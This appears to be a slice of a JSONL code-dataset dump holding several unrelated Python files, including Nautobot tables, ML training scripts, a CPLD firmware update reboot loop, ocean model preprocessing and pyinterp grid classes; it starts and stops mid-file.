None:\n root = n\n level += 1\n continue\n\n if i_ref <= i < i_ref*2:\n sum_left += n\n else:\n sum_right += n\n\n i += 1\n\n if sum_left > sum_right:\n return sum_left\n else:\n return sum_right","sub_path":"btsum.py","file_name":"btsum.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"525006506","text":"import django_tables2 as tables\n\nfrom nautobot.utilities.tables import (\n BaseTable,\n ButtonsColumn,\n LinkedCountColumn,\n TagColumn,\n ToggleColumn,\n)\nfrom .models import Tenant, TenantGroup\n\nMPTT_LINK = \"\"\"\n{% for i in record.get_ancestors %}\n \n{% endfor %}\n
{{ record.name }}\n\"\"\"\n\nCOL_TENANT = \"\"\"\n{% if record.tenant %}\n {{ record.tenant }}\n{% else %}\n —\n{% endif %}\n\"\"\"\n\n\n#\n# Tenant groups\n#\n\n\nclass TenantGroupTable(BaseTable):\n pk = ToggleColumn()\n name = tables.TemplateColumn(template_code=MPTT_LINK, orderable=False, attrs={\"td\": {\"class\": \"text-nowrap\"}})\n tenant_count = LinkedCountColumn(\n viewname=\"tenancy:tenant_list\",\n url_params={\"group\": \"slug\"},\n verbose_name=\"Tenants\",\n )\n actions = ButtonsColumn(TenantGroup, pk_field=\"slug\")\n\n class Meta(BaseTable.Meta):\n model = TenantGroup\n fields = (\"pk\", \"name\", \"tenant_count\", \"description\", \"slug\", \"actions\")\n default_columns = (\"pk\", \"name\", \"tenant_count\", \"description\", \"actions\")\n\n\n#\n# Tenants\n#\n\n\nclass TenantTable(BaseTable):\n pk = ToggleColumn()\n name = tables.LinkColumn()\n tags = TagColumn(url_name=\"tenancy:tenant_list\")\n\n class Meta(BaseTable.Meta):\n model = Tenant\n fields = (\"pk\", \"name\", \"slug\", \"group\", \"description\", \"tags\")\n default_columns = (\"pk\", \"name\", \"group\", \"description\")\n","sub_path":"nautobot/tenancy/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":1572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"54090404","text":"from twisted.internet.defer import inlineCallbacks\nfrom labrad.wrappers import connectAsync\n\nfrom conductor_device.conductor_parameter import ConductorParameter\n \nclass IsLocked(ConductorParameter):\n priority = 1\n busy = False\n locked_threshold = -10\n \n @inlineCallbacks\n def initialize(self):\n yield self.connect()\n # device name looks wrong, but is correct\n yield self.cxn.spectrum_analyzer.select_device('red_mot')\n \n @inlineCallbacks\n def update(self):\n if not self.busy:\n try:\n self.busy = True\n trace = yield self.cxn.spectrum_analyzer.trace()\n if max(trace) >= self.locked_threshold:\n self.value = True\n else:\n self.value = False\n yield self.cxn.beeper.beep('m2 verdi unlocked')\n except Exception as e:\n raise e\n finally:\n self.busy = False\n\n","sub_path":"conductor/devices/m2_verdi/is_locked.py","file_name":"is_locked.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"532650000","text":"def celsius_from_fahrenheit(temp_c):\n \"\"\" Converts temperature from degrees F to degrees C\n\n :param temp_c: float with the temperature in degrees Celsius\n :return: float of temperature in degrees Fahrenheit\n \"\"\"\n temp_f = temp_c * 1.8 + 32\n\n return temp_f\n\n\ndef fever_detection(temp_list):\n max_temp = max(temp_list)\n is_fever = False\n temp_thresh = 100\n for temperature in temp_list:\n if temperature > temp_thresh:\n is_fever = True\n\n return max_temp, is_fever\n","sub_path":"temp_conversion_module.py","file_name":"temp_conversion_module.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"34174527","text":"import numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n#import matplotlib.pyplot as plt\n#import seaborn as sns\nfrom sklearn import preprocessing\n#import h5py\nfrom sqlalchemy import create_engine\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.metrics import mean_absolute_error\n#from sklearn.ensemble import AdaBoostRegressor\n#from sklearn.ensemble import ExtraTreesClassifier\n#from sklearn.feature_selection import SelectKBest\n#from sklearn.feature_selection import chi2\nfrom sklearn.model_selection import GridSearchCV\n\ndef main():\n\tflights = pd.read_csv('DelaysOnlyRegressorTop10.csv')\n\tprint(\"Loaded in all data...\")\n\n\torig_airports = flights['ORIGIN_AIRPORT'].tolist()\n\tdest_airports = flights['DESTINATION_AIRPORT'].tolist()\n\tmanufacts = flights['Manu'].tolist()\n\tmodels = flights['Model'].tolist()\n\tarr_sky = flights['arr_sky'].tolist()\n\tdept_sky = flights['dept_sky'].tolist()\n\tairlines = flights['AIRLINE'].tolist()\n\n\tle_airports = preprocessing.LabelEncoder()\n\tle_manu = preprocessing.LabelEncoder()\n\tle_model = preprocessing.LabelEncoder()\n\tle_sky = preprocessing.LabelEncoder()\n\tle_airline = preprocessing.LabelEncoder()\n\n\tle_airports.fit(orig_airports)\n\tle_manu.fit(manufacts)\n\tle_model.fit(models)\n\tle_sky.fit(arr_sky)\n\tle_airline.fit(airlines)\n\n\tenc_orig_airports = le_airports.transform(orig_airports)\n\tenc_dest_airports = le_airports.transform(dest_airports)\n\tenc_manufacts = le_manu.transform(manufacts)\n\tenc_models = le_model.transform(models)\n\tenc_arr_sky = le_sky.transform(arr_sky)\n\tenc_dept_sky = le_sky.transform(dept_sky)\n\tenc_airlines = le_airline.transform(airlines)\n\n\tflights['ORIGIN_AIRPORT'] = enc_orig_airports\n\tflights['DESTINATION_AIRPORT'] = enc_dest_airports\n\tflights['Model'] = enc_models\n\tflights['Manu'] = enc_manufacts\n\tflights['dept_sky'] = enc_dept_sky\n\tflights['arr_sky'] = enc_arr_sky\n\tflights['AIRLINE'] = enc_airlines\n\n\tfeatures = [i for i in list(flights) if i != \"ARRIVAL_DELAY\"]\n\n\tX = flights[features]\n\ty = flights[\"ARRIVAL_DELAY\"]\n\tX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1)\n\tassert(len(X_train) != len(X_test))\n\tassert(len(X_train) == len(y_train))\n\tprint(\"Split inputs into training and testing ...\")\n\ttrainErrors = []\n\ttestErrors = []\n\n\tfor v in [1e-3,1e-2,1e-1]:\n\t\treg = DecisionTreeRegressor(min_samples_split = v) #min_impurity_split=v)\n\t\treg.fit(X_train, y_train)\n\t\ty_pred_train = reg.predict(X_train)\n\t\ty_pred_test = reg.predict(X_test)\n\t\tassert(len(y_pred_train) != len(y_pred_test))\n\t\tprint((v, mean_absolute_error(y_train, y_pred_train)), (v, mean_absolute_error(y_test, y_pred_test)))\n\t\ttrainErrors.append((v, mean_absolute_error(y_train, y_pred_train)))\n\t\ttestErrors.append((v, mean_absolute_error(y_test, y_pred_test)))\n\t\t\n\n\tprint('Training Errors:', trainErrors)\n\tprint('Test Errors:', testErrors)\n\nif __name__ == '__main__':\n\tmain()","sub_path":"Scripts/DecisionTreeRegressorDelaysOnly.py","file_name":"DecisionTreeRegressorDelaysOnly.py","file_ext":"py","file_size_in_byte":3045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"258243182","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n'''\n@AUTHOR:Joselyn Zhao\n@CONTACT:zhaojing17@foxmail.com\n@HOME_PAGE:joselynzhao.top\n@SOFTWERE:PyCharm\n@FILE:train.py\n@TIME:2019/6/22 20:50\n@DES:\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nold_v = tf.logging.get_verbosity()\ntf.logging.set_verbosity(tf.logging.ERROR)\nimport tensorflow.contrib.slim as slim\n\nfrom tensorflow.python.framework import graph_util\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nfrom sklearn.utils import shuffle\n\nfrom lenet import *\n\nif __name__ ==\"__main__\":\n mnist = input_data.read_data_sets('../../../data/mnist', one_hot=True)\n x_test = np.reshape(mnist.test.images,[-1,28,28,1])\n x_test = np.pad(x_test, ((0, 0), (2, 2), (2, 2), (0, 0)), 'constant') # print(\"Updated Image Shape: {}\".format(X_train[0].shape))\n tf.logging.set_verbosity(old_v)\n\n iteratons = 1000\n batch_size = 8\n ma = 0\n sigma = 0.1\n lr = 0.01\n mylenet = Lenet(ma,sigma,lr)\n\n image_x = []\n image_y_acc = []\n image_y_loss = []\n\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for ii in range(iteratons):\n batch_xs,batch_ys = mnist.train.next_batch(batch_size)\n batch_xs = np.reshape(batch_xs,[-1,28,28,1])\n batch_xs = np.pad(batch_xs,((0, 0), (2, 2), (2, 2), (0, 0)), 'constant')\n sess.run(mylenet.train_op,feed_dict ={mylenet.x:batch_xs,mylenet.y_:batch_ys})\n if ii % 10 == 0:\n vali_batch_x,vali_batch_y = mnist.validation.next_batch(100)\n vali_batch_x = np.reshape(vali_batch_x,[-1,28,28,1])\n vali_batch_x = np.pad(vali_batch_x,((0, 0), (2, 2), (2, 2), (0, 0)), 'constant')\n acc,loss = sess.run([mylenet.accuracy,mylenet.loss],feed_dict ={mylenet.x:vali_batch_x,mylenet.y_:vali_batch_y})\n print(\"%5d: accuracy is: %4f , loss is : %4f 。\" % (ii, acc, loss))\n image_x.append(ii)\n image_y_acc.append(acc)\n image_y_loss.append(loss)\n\n plt.plot(image_x, image_y_acc, 'r', label=\"accuracy\")\n plt.plot(image_x, image_y_loss, 'g', label=\"loss\")\n plt.xlabel(\"iteration\")\n plt.ylabel(\"accuracy\")\n plt.title(\"acc_loss_v1\")\n plt.savefig('./save/acc_loss_v1.png')\n plt.show()\n\n print('[accuracy,loss]:', sess.run([mylenet.accuracy], feed_dict={mylenet.x:x_test,mylenet.y_:mnist.test.labels}))\n\n\n","sub_path":"DL_8/work/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"347479389","text":"import subprocess\nimport sys\nimport argparse\nimport datetime\nimport time\nimport os\nimport shutil\n#===================================================================================\ndef Log(string):\n\tnow = datetime.datetime.today()\n\ttmp = \"[%02d/%02d %02d:%02d:%02d] %s\\n\"%(now.month, now.day, now.hour, now.minute, now.second, string)\n\tf = open(\"LOG.txt\", \"a\")\n\tf.write(tmp)\n\tf.close()\n\tprint(tmp.replace(\"\\n\",\"\"))\n#===================================================================================\ndef Reboot():\n\tLog(\"Reboot System in 10 Seconds\")\n\n\tfor i in range(10):\n\t\tprint(\"\t%d...\"%(10-i))\n\t\ttime.sleep(1)\n\n\tLog(\"Reboot System!!\")\n\tcmd = \"shutdown /r /f /t 0\"\n\tret = subprocess.call(cmd, shell=True, universal_newlines=True)\n\n\treturn ret\n#===================================================================================\ndef CPLD_Ver():\n\tcmd = \"ipmitool.exe -I wmi raw 0x30 0x33\"\n\tret = subprocess.check_output(cmd, shell=True, universal_newlines=True).split('\\n')\n\n\ttmp = ret[0].strip()\n\n\tif(tmp == \"01 00 02\"):\n\t\tver = \"1.0.2\"\n\telif(tmp == \"01 00 03\"):\n\t\tver = \"1.0.3\"\n\telse:\n\t\tver = \"0\"\n\n\treturn ver\n#===================================================================================\ndef Update_Cycle():\n\tf = open(\"CYCLE.txt\",\"r+\")\n\ttmp = int(f.read().strip(),10)\n\tf.seek(0)\n\tf.write(str(tmp+1))\n\tf.close()\n#===================================================================================\ndef GetVal(filename):\n\tf = open(filename,\"r\")\n\ttmp = int(f.read().strip(),10)\n\tf.close()\n\n\treturn tmp\n#===================================================================================\ndef Check_CPLD():\n\tLog(\"Check Current CPLD Version w/ Previous CPLD Version\")\n\n\tf = open(\"VER.txt\",\"r\")\n\told = f.read()\n\tf.close()\n\n\tnew = CPLD_Ver()\n\n\tLog(\"Previous CPLD Version: %s\"%(old))\n\tLog(\"Current CPLD Version: %s\"%(new))\n\n\tif(new == old):\n\t\tret = \"CPLD Update Fail (%s)\"%(new)\n\t\treturn ret\n\telif(new == \"1.0.2\" and old == \"1.0.3\"):\n\t\tf = open(\"VER.txt\",\"w\")\n\t\tf.write(new)\n\t\tf.close()\n\t\treturn 0\n\telif(new == \"1.0.3\" and old == \"1.0.2\"):\n\t\tf = open(\"VER.txt\",\"w\")\n\t\tf.write(new)\n\t\tf.close()\n\t\treturn 0\n\telse:\n\t\tret = \"Unknown Error\"%(new)\n\t\treturn ret\n#===================================================================================\ndef Remove():\n\ttmp_list = [\"CYCLE.txt\", \"MAX.txt\", \"LOG.txt\", \"cpld.txt\", \"VER.txt\"]\n\n\tfor i in tmp_list:\n\t\tif(os.path.exists(i) == True):\n\t\t\tos.remove(i)\n#===================================================================================\ndef Init():\n\tglobal args\n\n\tRemove()\n\n\tLog(\"SBS CPLD FW Upate, by CESBG-EPDI-TE\")\n\tLog(\"Total Test Cycle: %d\"%args.cycle)\n\tLog(\"Create CYCLE.txt, MAX.txt and VER.txt\")\n\n\tf = open(\"CYCLE.txt\",\"w\")\n\tf.write(str(0))\n\tf.close()\n\n\tf = open(\"MAX.txt\",\"w\")\n\tf.write(str(args.cycle))\n\tf.close()\n\n\tf = open(\"VER.txt\",\"w\")\n\tf.write(CPLD_Ver())\n\tf.close()\n\n\tLog(\"Test Initialization Finish!!\")\n#===================================================================================\ndef End():\n\tLog(\"Test End\")\n\tnow = datetime.datetime.now()\n\tfilename = \"Log_%02d%02d-%02d%02d.txt\"%(now.month, now.day, now.hour, now.minute)\n\tLog(\"Log Filename: %s\"%(filename))\n\tshutil.move(\"LOG.txt\", filename)\n\tRemove()\n\tos.system(\"pause\")\n#===================================================================================\ndef Update_CPLD():\n\tnew = CPLD_Ver()\n\n\tif(new == \"1.0.2\"):\n\t\tLog(\"Update CPLD FW to 1.0.3 ...\")\n\t\tcmd = \"CPLD_Firmware_VVWH6_WN64_1.0.3_A00.exe /f /s /log=cpld.txt\"\n\telif(new == \"1.0.3\"):\n\t\tLog(\"Update CPLD FW to 1.0.2 ...\")\n\t\tcmd = \"CPLD_Firmware_YTMHK_WN64_1.0.2_A00.exe /f /s /log=cpld.txt\"\n\telse:\n\t\treturn False\n\n\tif(os.path.exists(\"cpld.txt\") == True):\n\t\tos.remove(\"cpld.txt\")\n\n\tret = subprocess.call(cmd, shell=True, universal_newlines=True)\n\n\tf = open(\"cpld.txt\",\"r\")\n\tlog = f.readlines()\n\tf.close()\n\n\tfor i in log:\n\t\tif(\"Update Package finished. Exit code = 2\" in i):\n\t\t\treturn True\n\n\treturn False\n#===================================================================================\ndef main(argv):\n\tglobal args\n\n\tVER = \"1.0\"\n\n\topts = argparse.ArgumentParser(description = \"SBS CPLD FW Upate, by CESBG-EPDI-TE\\nVersion: %s\"%VER, epilog = \"Example: python SBS_CPLD.py -c 500\")\n\tgroup = opts.add_mutually_exclusive_group()\n\topts.add_argument('-v', '--version', action = 'version', version = VER, help = \"Show Version\")\n\tgroup.add_argument('-c', '--cycle', type = int, required = False, default = 0, help = \"Test Cycle\")\n\tgroup.add_argument('-r', '--remove', action = \"store_true\", required = False, help = \"Remove Template File\")\n\tgroup.add_argument('-d', '--debug', type = int, required = False, help = \"Debug Command\")\n\n\n\targs = opts.parse_args()\n\n\tif(args.debug == 16697):\n\t\tprint(CPLD_Ver())\n\t\treturn\n\telif(args.debug == 12345):\n\t\tUpdate_CPLD()\n\t\treturn\n\telif(args.debug == 11111):\n\t\tReboot()\n\t\treturn\n\telif(args.remove == True):\n\t\tRemove()\n\t\treturn\n\telif(args.cycle > 0):\n\t\tInit()\n\t\tLog(\"Current CPLD Version: %s\"%(CPLD_Ver()))\n\t\tret = Update_CPLD()\n\t\tif(ret == False):\n\t\t\tLog(\"Update CPLD FW Fail!!\")\n\t\t\treturn\n\n\t\tUpdate_Cycle()\n\t\tReboot()\n\telif(os.path.exists(\"CYCLE.txt\") == True and os.path.exists(\"MAX.txt\") == True and os.path.exists(\"VER.txt\") == True):\n\t\tcycle = GetVal(\"CYCLE.txt\")\n\t\tmax = GetVal(\"MAX.txt\")\n\n\t\tLog(\"Cycle[%d/%d]...\"%(cycle,max))\n\n\t\tret = Check_CPLD()\n\t\tif(ret != 0):\n\t\t\tLog(ret)\n\t\t\treturn\n\n\t\tif(cycle < max):\n\t\t\tret = Update_CPLD()\n\t\t\tif(ret == True):\n\t\t\t\tLog(\"Cycle[%d/%d]: Pass!!\"%(cycle,max))\n\t\t\t\tUpdate_Cycle()\n\t\t\t\tReboot()\n\t\t\telse:\n\t\t\t\tLog(\"Update CPLD FW Fail!!\")\n\t\telif(cycle == max):\n\t\t\tLog(\"Cycle[%d/%d]: Pass!!\"%(cycle,max))\n\t\t\tLog(\"Current CPLD Version: %s\"%(CPLD_Ver()))\n\t\t\tEnd()\n\telse:\n\t\topts.print_help()\n\n\treturn\n#===================================================================================\nif(__name__ == \"__main__\"):\n\ttry:\n\t\tmain(sys.argv)\n\texcept Exception as e:\n\t\tprint(\"ERROR: %s\"%(str(e)))\n\t\tsys.exit(-1)\n\tsys.exit(0)\n","sub_path":"Module/SBS_CPLD.py","file_name":"SBS_CPLD.py","file_ext":"py","file_size_in_byte":5858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"63171956","text":"import slimPre\nimport numpy as np\n\nrun_dir = 'data/'\nslimPre.make_directory(run_dir)\n\nslimPre.write_file(run_dir+'bath.nc',None,None,[('bath',1000)])\n\nmesh_file = 'square.msh'\n\nprint('Extruding mesh')\ndef shiftOperation(node, iPerBound) :\n n = [node[0] - 1.6e5, node[1], node[2]]\n return n\ncutTags = [\"cut\"]\npasteTags = [\"paste\"]\nmapFilename = \"periodicMesh.txt\"\nperiodicity = (shiftOperation, cutTags, pasteTags, mapFilename)\n\nnPart = 96\nslimPre.dgpy.dgMeshPartition(mesh_file, nPart)\nmesh_file = mesh_file[:-4] + '_' + str(nPart)+'.msh'\n\nslimPre.extrude(mesh_file, (run_dir+'bath.nc','bath'), nb_layers=20, mesh_file_name_out=run_dir+'mesh3d.msh', periodicity=periodicity)\n\nprint('Loading 3D mesh')\nmesh_file = run_dir + \"mesh3d.msh\"\n\nmesh = slimPre.Mesh(mesh_file)\nregion_global = slimPre.Region(mesh)\n\nprint('Preprocessing coriolis')\nxyz = region_global.coordinates\ncoriolis = -1.2e-4\nslimPre.write_file(run_dir+'coriolis.nc', region=None, time=None, data=[('coriolis', coriolis)])\nslimPre.netcdf_to_msh(mesh_file, run_dir+'coriolis.nc', 'coriolis', 'coriolis')\n\nprint('Preprocessing initial temperature')\nxyz = region_global.coordinates\ntheta0 = 10.1 + 3*(-975.-xyz[:,2])/(-975.)\nyw = 2.5e5-4e4*np.sin(2*np.pi*3*xyz[:,0]/1.6e5)\nfact = 1. - (xyz[:,1]-yw[:])/4.e4\nindx = fact < 0.\nfact[indx] = 0.\nindx = fact > 1.\nfact[indx] = 1.\ntheta = theta0[:]-1.2*fact[:]\n\nyw_t = 2.5e5-2.0e4*np.sin(np.pi*(xyz[:,0]-1.1e5)/2.0e4)\ntheta_t = 0.3*(1.0 - (xyz[:,1] - yw_t)/2.0e4)\nindx = (xyz[:,0] > 1.1e5) * (xyz[:,0] < 1.3e5) * (xyz[:,1] > yw_t[:] - 2.0e4) * (xyz[:,1] < yw_t[:] + 2.0e4)\ntheta[indx] += theta_t[indx]\n\nslimPre.write_file(run_dir+'initialTemp.nc', region=region_global, time=None, data=[('temp', theta)])\nslimPre.netcdf_to_msh(mesh_file, run_dir+'initialTemp.nc', 'temp', 'temp')\n\nprint('preprocessing done')\nslimPre.exit(0)\n","sub_path":"baroclinic_eddies/ilicak/prepro.py","file_name":"prepro.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"629737784","text":"import unittest\nimport doctest\nimport tempfile\nimport os\nimport sys\nfrom contextlib import contextmanager\nfrom pkg_resources import working_set, resource_filename\n\nfrom zc.buildout.easy_install import install\nfrom zc.buildout import testing\n\nfrom hurry import resource\n\n@contextmanager\ndef pwd(directory):\n before = os.getcwd()\n os.chdir(directory)\n yield\n os.chdir(before)\n\n\ndef setUp(test):\n test.target_dir = tempfile.mkdtemp('hurry.resource.test-installs')\n\n # Inspired by the test setup from z3c.autoinclude.\n project_dir = resource_filename('hurry.resource', 'testdata/MyPackage')\n dist_dir = os.path.join(project_dir, 'dist')\n\n if os.path.isdir(dist_dir):\n testing.rmdir(dist_dir)\n\n with pwd(project_dir):\n testing.system('%s setup.py sdist' % (sys.executable))\n\n new_working_set = install(['mypackage'],\n test.target_dir,\n links=[dist_dir],\n working_set=working_set)\n\n # we must perform a magical incantation on each distribution\n for dist in new_working_set:\n dist.activate()\n\n\ndef tearDown(test):\n testing.remove(test.target_dir)\n\n\nclass ConfigTests(unittest.TestCase):\n pass\n\n # def test_library_url(self):\n # library = resource.Library('foo', '')\n # inclusion = resource.ResourceInclusion(library, 'bar.js')\n # needed = resource.NeededInclusions()\n # needed.base_url = 'http://localhost/static'\n # print needed.library_url(library)\n # self.assertEquals('http://localhost/static:hash:2797572843/foo/',\n # needed.library_url(library)) \n\ndef test_suite():\n suite = unittest.makeSuite(ConfigTests)\n readme = doctest.DocFileSuite(\n 'README.txt',\n setUp=setUp,\n tearDown=tearDown,\n optionflags=doctest.NORMALIZE_WHITESPACE | doctest.ELLIPSIS)\n suite.addTest(readme)\n return suite\n","sub_path":"hurry.resource/branches/janjaapdriessen-resource-publisher/src/hurry/resource/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"275470035","text":"# Copyright (c) 2023 CNES\n#\n# All rights reserved. Use of this source code is governed by a\n# BSD-style license that can be found in the LICENSE file.\n\"\"\"\nRegular grids\n=============\n\"\"\"\nfrom typing import Optional, Union\n\nimport numpy\n\nfrom . import core, interface\n\n\nclass Grid2D:\n \"\"\"2D Cartesian Grid.\n\n Args:\n x (pyinterp.Axis): X-Axis.\n y (pyinterp.Axis): Y-Axis.\n array (numpy.ndarray): Discrete representation of a continuous function\n on a uniform 2-dimensional grid.\n increasing_axes: Optional string indicating how to ensure that the grid\n axes are increasing. If axes are decreasing, the axes and grid\n provided will be flipped in place or copied before being flipped. By\n default, the decreasing axes are not modified.\n\n Examples:\n\n >>> import numpy as np\n >>> import pyinterp\n >>> x_axis = pyinterp.Axis(numpy.arange(-180.0, 180.0, 1.0),\n ... is_circle=True)\n >>> y_axis = pyinterp.Axis(numpy.arange(-80.0, 80.0, 1.0),\n ... is_circle=False)\n >>> array = numpy.zeros((len(x_axis), len(y_axis)))\n >>> grid = pyinterp.Grid2D(x_axis, y_axis, array)\n >>> grid\n \n array([[0., 0., 0., ..., 0., 0., 0.],\n [0., 0., 0., ..., 0., 0., 0.],\n [0., 0., 0., ..., 0., 0., 0.],\n ...,\n [0., 0., 0., ..., 0., 0., 0.],\n [0., 0., 0., ..., 0., 0., 0.],\n [0., 0., 0., ..., 0., 0., 0.]])\n Axis:\n * x: \n min_value: -180.0\n max_value: 179.0\n step: 1.0\n is_circle: True\n * y: \n min_value: -80.0\n max_value: 79.0\n step: 1.0\n is_circle: False\n \"\"\"\n #: The number of grid dimensions handled by this object.\n _DIMENSIONS = 2\n\n def __init__(self, *args, increasing_axes: Optional[str] = None):\n prefix = ''\n for idx, item in enumerate(args):\n if isinstance(item, core.TemporalAxis):\n prefix = 'Temporal'\n break\n _class = f'{prefix}Grid{self._DIMENSIONS}D' + \\\n interface._core_class_suffix(args[-1], handle_integer=True)\n if increasing_axes is not None:\n if increasing_axes not in ['inplace', 'copy']:\n raise ValueError('increasing_axes '\n f'{increasing_axes!r} is not defined')\n inplace = increasing_axes == 'inplace'\n # Tuple does not support item assignment\n args = list(args)\n for idx, item in enumerate(args):\n if isinstance(item,\n (core.Axis,\n core.TemporalAxis)) and not item.is_ascending():\n args[idx] = item.flip(inplace=inplace)\n args[-1] = numpy.flip(args[-1], axis=idx)\n self._instance = getattr(core, _class)(*args)\n self._prefix = prefix\n\n def __repr__(self):\n \"\"\"Called by the ``repr()`` built-in function to compute the string\n representation of this instance.\"\"\"\n\n def pad(string, length):\n \"\"\"Pad a string to a given length.\"\"\"\n return '\\n'.join([(' ' * length if ix else '') + line\n for ix, line in enumerate(string.split('\\n'))])\n\n result = [\n f'<{self.__module__}.{self.__class__.__name__}>',\n repr(self.array),\n ]\n result.append('Axis:')\n for item in dir(self):\n attr = getattr(self, item)\n if isinstance(attr, (core.Axis, core.TemporalAxis)):\n prefix = f'* {item}: '\n result.append(f' {prefix}{pad(repr(attr), len(prefix))}')\n return '\\n'.join(result)\n\n @property\n def x(self) -> core.Axis:\n \"\"\"Gets the X-Axis handled by this instance.\n\n Returns:\n X-Axis.\n \"\"\"\n return self._instance.x\n\n @property\n def y(self) -> core.Axis:\n \"\"\"Gets the Y-Axis handled by this instance.\n\n Returns:\n Y-Axis.\n \"\"\"\n return self._instance.y\n\n @property\n def array(self) -> numpy.ndarray:\n \"\"\"Gets the values handled by this instance.\n\n Returns:\n numpy.ndarray: values.\n \"\"\"\n return self._instance.array\n\n\nclass Grid3D(Grid2D):\n \"\"\"3D Cartesian Grid.\n\n Args:\n x (pyinterp.Axis): X-Axis.\n y (pyinterp.Axis, pyinterp.TemporalAxis): Y-Axis.\n z (pyinterp.Axis): Z-Axis.\n array (numpy.ndarray): Discrete representation of a continuous function\n on a uniform 3-dimensional grid.\n increasing_axes: Ensure that the axes of the grid are increasing. If\n this is not the case, the axes and grid provided will be flipped.\n Default to False.\n\n .. note::\n\n If the Z axis is a :py:class:`temporal axis\n `, the grid will handle this axis during\n interpolations as a time axis.\n\n Examples:\n\n >>> import numpy as np\n >>> import pyinterp\n >>> x_axis = pyinterp.Axis(numpy.arange(-180.0, 180.0, 1.0),\n ... is_circle=True)\n >>> y_axis = pyinterp.Axis(numpy.arange(-80.0, 80.0, 1.0),\n ... is_circle=False)\n >>> z_axis = pyinterp.TemporalAxis(\n ... numpy.array(['2000-01-01'], dtype=\"datetime64[s]\"))\n >>> array = numpy.zeros((len(x_axis), len(y_axis), len(z_axis)))\n >>> grid = pyinterp.Grid3D(x_axis, y_axis, z_axis, array)\n \"\"\"\n _DIMENSIONS = 3\n\n def __init__(self, *args, increasing_axes: Optional[str] = None):\n super().__init__(*args, increasing_axes=increasing_axes)\n\n @property\n def z(self) -> Union[core.Axis, core.TemporalAxis]:\n \"\"\"Gets the Z-Axis handled by this instance.\n\n Returns:\n Z-Axis.\n \"\"\"\n return self._instance.z\n\n\nclass Grid4D(Grid3D):\n \"\"\"4D Cartesian Grid.\n\n Args:\n x (pyinterp.Axis): X-Axis.\n y (pyinterp.Axis): Y-Axis.\n z (pyinterp.Axis, pyinterp.TemporalAxis): Z-Axis.\n u (pyinterp.Axis): U-Axis.\n array (numpy.ndarray): Discrete representation of a continuous\n function on a uniform 4-dimensional grid.\n increasing_axes: Ensure that the axes of the grid are increasing.\n If this is not the case, the axes and grid provided will be\n flipped. Default to False.\n\n .. note::\n\n If the Z axis is a temporal axis, the grid will handle this axis\n during interpolations as a time axis.\n \"\"\"\n _DIMENSIONS = 4\n\n def __init__(self, *args, increasing_axes: Optional[str] = None):\n super().__init__(*args, increasing_axes=increasing_axes)\n\n @property\n def u(self) -> core.Axis:\n \"\"\"Gets the U-Axis handled by this instance.\n\n Returns:\n U-Axis.\n \"\"\"\n return self._instance.u\n\n\ndef _core_variate_interpolator(instance: object, interpolator: str, **kwargs):\n \"\"\"Obtain the interpolator from the string provided.\"\"\"\n if isinstance(instance, Grid2D):\n dimensions = instance._DIMENSIONS\n # 4D interpolation uses the 3D interpolator\n if dimensions > 3:\n dimensions -= 1\n else:\n raise TypeError('instance is not an object handling a grid.')\n\n prefix = instance._prefix\n\n if interpolator == 'bilinear':\n return getattr(core, f'{prefix}Bilinear{dimensions}D')(**kwargs)\n if interpolator == 'nearest':\n return getattr(core, f'{prefix}Nearest{dimensions}D')(**kwargs)\n if interpolator == 'inverse_distance_weighting':\n return getattr(\n core, f'{prefix}InverseDistanceWeighting{dimensions}D')(**kwargs)\n\n raise ValueError(f'interpolator {interpolator!r} is not defined')\n","sub_path":"src/pyinterp/grid.py","file_name":"grid.py","file_ext":"py","file_size_in_byte":8037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"204210888","text":"#positions command\n#only works if units are in remote control mode\n#units need to be initialised, run init.py beforehand, if this is not the case\n#set fixed positions for all units, or for each unit individually\n#specifying just a single position will lead to a movement of all 3 units (e.g. pos 5000)\n#send position to a certain unit (1, 2, 3) when different positions are specified (e.g. pos.py 5000 5500 6000)\n#a unit will not be moved if the position is set to x (e.g. pos.py 2000 x x means that only unit 1 will be moved to 2000, whereas units 2, 3 remain at their current position, only unit 2 would be x 2000 x, and only unit 3 would be x x 2000)\n#the expected time to finish is printed in the beginning\n#an overview of the current positions is printed every 5 sec\n#the speed of the movement is approx. 10 mm/s\n#the setup of the units needs to be as follows: 1, 2, 3 at control box ports 1, 2, 3; usb-to-serial converter port 2)\n#in case of errors the script exits on 1\n\n\n\n\nimport platform\nimport serial\nimport time\nimport sys\nimport os\nfrom datetime import datetime\n\n\nport = 1\nbaudrate = 9600\n\n#time step for position update during movement 5 sec\ndelta_t = 5\n#average speed 10 mm / sec\nv = 10\n#bandlength\nlength = [9500, 8690, 9500]\n#precision\nprec = 10\n\n\n#read in positions\nend_pos = []\n\nfor unit_num in range(3):\n if len(sys.argv) - 1 == 